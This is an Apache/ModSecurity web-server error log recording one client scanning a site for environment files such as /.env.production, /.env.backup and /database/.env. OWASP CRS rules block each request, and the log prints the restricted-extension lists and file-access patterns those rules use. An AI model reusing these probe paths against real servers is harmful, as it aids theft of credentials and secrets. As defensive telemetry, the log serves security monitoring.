[Sat Nov 29 01:24:16.432551 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSo9MFonenFtamV5yHYc3QAAAAI"]
[Sat Nov 29 01:24:16.432600 2025] [:error] [pid 395885] [client 3.99.142.85:38272] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSo9MCl2_ayZcB2mSooNdQAAAAk"]
[Sat Nov 29 01:24:16.432729 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSo9MFonenFtamV5yHYc3QAAAAI"]
[Sat Nov 29 01:24:16.432776 2025] [:error] [pid 395885] [client 3.99.142.85:38272] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSo9MCl2_ayZcB2mSooNdQAAAAk"]
[Sat Nov 29 01:24:16.433665 2025] [:error] [pid 395860] [client 3.99.142.85:38274] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSo9MGGVbW32jAuRdZj-NQAAAAY"]
[Sat Nov 29 01:24:16.433807 2025] [:error] [pid 395860] [client 3.99.142.85:38274] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSo9MGGVbW32jAuRdZj-NQAAAAY"]
[Sat Nov 29 01:24:16.433957 2025] [:error] [pid 395860] [client 3.99.142.85:38274] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSo9MGGVbW32jAuRdZj-NQAAAAY"]
[Sat Nov 29 01:24:16.846093 2025] [:error] [pid 395859] [client 3.99.142.85:38330] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aSo9MFoA1e4Hc_0ExRYafQAAAAU"]
[Sat Nov 29 01:24:16.846327 2025] [:error] [pid 395859] [client 3.99.142.85:38330] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aSo9MFoA1e4Hc_0ExRYafQAAAAU"]
[Sat Nov 29 01:24:16.846580 2025] [:error] [pid 395859] [client 3.99.142.85:38330] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aSo9MFoA1e4Hc_0ExRYafQAAAAU"]
[Sat Nov 29 01:24:18.087313 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aSo9MjRmtvrSM4WZBRuJ0wAAAAs"]
[Sat Nov 29 01:24:18.087549 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aSo9MjRmtvrSM4WZBRuJ0wAAAAs"]
[Sat Nov 29 01:24:18.087729 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aSo9MjRmtvrSM4WZBRuJ0wAAAAs"]
[Sat Nov 29 01:24:18.417193 2025] [:error] [pid 395856] [client 3.99.142.85:38454] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aSo9Mlg4f0t0zfUT6VBlqwAAABg"]
[Sat Nov 29 01:24:18.417423 2025] [:error] [pid 395856] [client 3.99.142.85:38454] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aSo9Mlg4f0t0zfUT6VBlqwAAABg"]
[Sat Nov 29 01:24:18.417611 2025] [:error] [pid 395856] [client 3.99.142.85:38454] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aSo9Mlg4f0t0zfUT6VBlqwAAABg"]
[Sat Nov 29 01:24:18.418607 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aSo9MrVL27gtiM4DUrnKhQAAAAM"]
[Sat Nov 29 01:24:18.418762 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aSo9MrVL27gtiM4DUrnKhQAAAAM"]
[Sat Nov 29 01:24:18.418946 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aSo9MrVL27gtiM4DUrnKhQAAAAM"]
[Sat Nov 29 01:24:18.419108 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aSo9MrVL27gtiM4DUrnKhQAAAAM"]
[Sat Nov 29 01:24:19.657678 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSo9M1onenFtamV5yHYc3gAAAAI"]
[Sat Nov 29 01:24:19.657922 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSo9M1onenFtamV5yHYc3gAAAAI"]
[Sat Nov 29 01:24:19.658100 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSo9M1onenFtamV5yHYc3gAAAAI"]
[Sat Nov 29 01:24:19.998732 2025] [:error] [pid 395857] [client 3.99.142.85:38734] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSo9MzSCF_TM1-8eXUjH3QAAAAw"]
[Sat Nov 29 01:24:19.998957 2025] [:error] [pid 395880] [client 3.99.142.85:38736] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aSo9M-AuBAvUw7PEZazKPAAAAAE"]
[Sat Nov 29 01:24:19.998994 2025] [:error] [pid 395857] [client 3.99.142.85:38734] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSo9MzSCF_TM1-8eXUjH3QAAAAw"]
[Sat Nov 29 01:24:19.999152 2025] [:error] [pid 395880] [client 3.99.142.85:38736] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aSo9M-AuBAvUw7PEZazKPAAAAAE"]
[Sat Nov 29 01:24:19.999281 2025] [:error] [pid 395857] [client 3.99.142.85:38734] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSo9MzSCF_TM1-8eXUjH3QAAAAw"]
[Sat Nov 29 01:24:19.999319 2025] [:error] [pid 395880] [client 3.99.142.85:38736] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aSo9M-AuBAvUw7PEZazKPAAAAAE"]
[Sat Nov 29 01:24:20.209254 2025] [:error] [pid 396953] [client 3.99.142.85:38980] [client 3.99.142.85] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSo9NNGQuPTi3WQRVei-fAAAAAA"]
[Sat Nov 29 01:24:20.209490 2025] [:error] [pid 396953] [client 3.99.142.85:38980] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSo9NNGQuPTi3WQRVei-fAAAAAA"]
[Sat Nov 29 01:24:20.209756 2025] [:error] [pid 396953] [client 3.99.142.85:38980] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSo9NNGQuPTi3WQRVei-fAAAAAA"]
[Sat Nov 29 01:24:20.209964 2025] [:error] [pid 396953] [client 3.99.142.85:38980] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSo9NNGQuPTi3WQRVei-fAAAAAA"]
[Sat Nov 29 01:24:20.639141 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aSo9NDRmtvrSM4WZBRuJ1AAAAAs"]
[Sat Nov 29 01:24:20.639387 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aSo9NDRmtvrSM4WZBRuJ1AAAAAs"]
[Sat Nov 29 01:24:20.639572 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aSo9NDRmtvrSM4WZBRuJ1AAAAAs"]
[Sat Nov 29 01:24:21.453038 2025] [authz_core:error] [pid 396954] [client 3.99.142.85:39298] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Sat Nov 29 01:24:21.616346 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSo9NbVL27gtiM4DUrnKhgAAAAM"]
[Sat Nov 29 01:24:21.616565 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSo9NbVL27gtiM4DUrnKhgAAAAM"]
[Sat Nov 29 01:24:21.616753 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSo9NbVL27gtiM4DUrnKhgAAAAM"]
